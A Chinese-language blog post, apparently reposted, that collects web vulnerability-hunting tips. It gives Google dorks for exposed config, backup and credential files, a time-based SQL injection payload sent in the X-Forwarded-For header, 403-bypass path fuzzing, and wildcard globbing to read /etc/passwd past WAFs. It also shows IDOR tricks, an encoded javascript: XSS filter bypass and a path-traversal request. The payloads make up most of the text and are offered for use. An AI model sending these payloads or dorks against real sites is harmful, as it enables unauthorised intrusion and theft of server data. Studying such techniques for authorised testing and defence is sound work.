【新奇思路】不错的漏洞搜集思路分享

思路收集于网络,安全小天地只是做了一点整理。

1.利用google语法 发现注入:

site:target.com intext:"sql syntax near" |  intext:"incorrect syntax near"
site:target.com intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()"
site:"example[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess

2.备份文件

config.inc.php.bk扫到敏感信息,在字典中批量加入一些配置文件的备份是很有必要的,当然常规的zip等字典还是要自己经常维护更新哦

3.xff测试

X-Forwarded-for简称XFF头,它代表客户端真实的IP,通过修改X-Forwarded-for的值可以伪造客户端IP。

现在大部分系统会记录登录者的ip,在登录的时候利用xff测试sql注入

X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z

4.403bypass

/admin/files --> 302  /authFailure
/adminFUZZ/files --> 200
/admin/FUZZ/files --> 200

5.通配符绕过

当遇到WAF或过滤器来阻止RCE和LFI时,您可以通过globbing绕过它。

/usr/bin/cat /etc/passwd ==  /???/???/c?t$IFS/???/p?s?w?

6.关于逻辑漏洞小tips

IDOR,Insecure Direct Object reference,即"不安全的直接对象引用",场景为基于用户提供的输入对象进行访问时,未进行权限验证。IDOR漏洞其实在越权(Broken Access Control)漏洞的范畴之内,也可以说是逻辑漏洞,或是访问控制漏洞,国内通常被称为越权漏洞。

在测试idor的时候把 node/1,2,3 换成 /node/001, /node/011  发现了idor漏洞

7.修改参数

GET /v1/transactions/all  
GET /v1/transactions/813  发现idor漏洞

8.xss bypass

<a href=http://example[.]com> ✅
<a href=aaa:bbb> ✅
<a href=javascript:bbb> ❌
<a href=jav%26%23x61%3bscript:alert()> ????

9.任意文件读取:

Payload: GET /assets/css///////../../../../../../../../etc/passwd  
© 版权声明
THE END
喜欢就支持一下吧
点赞5 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容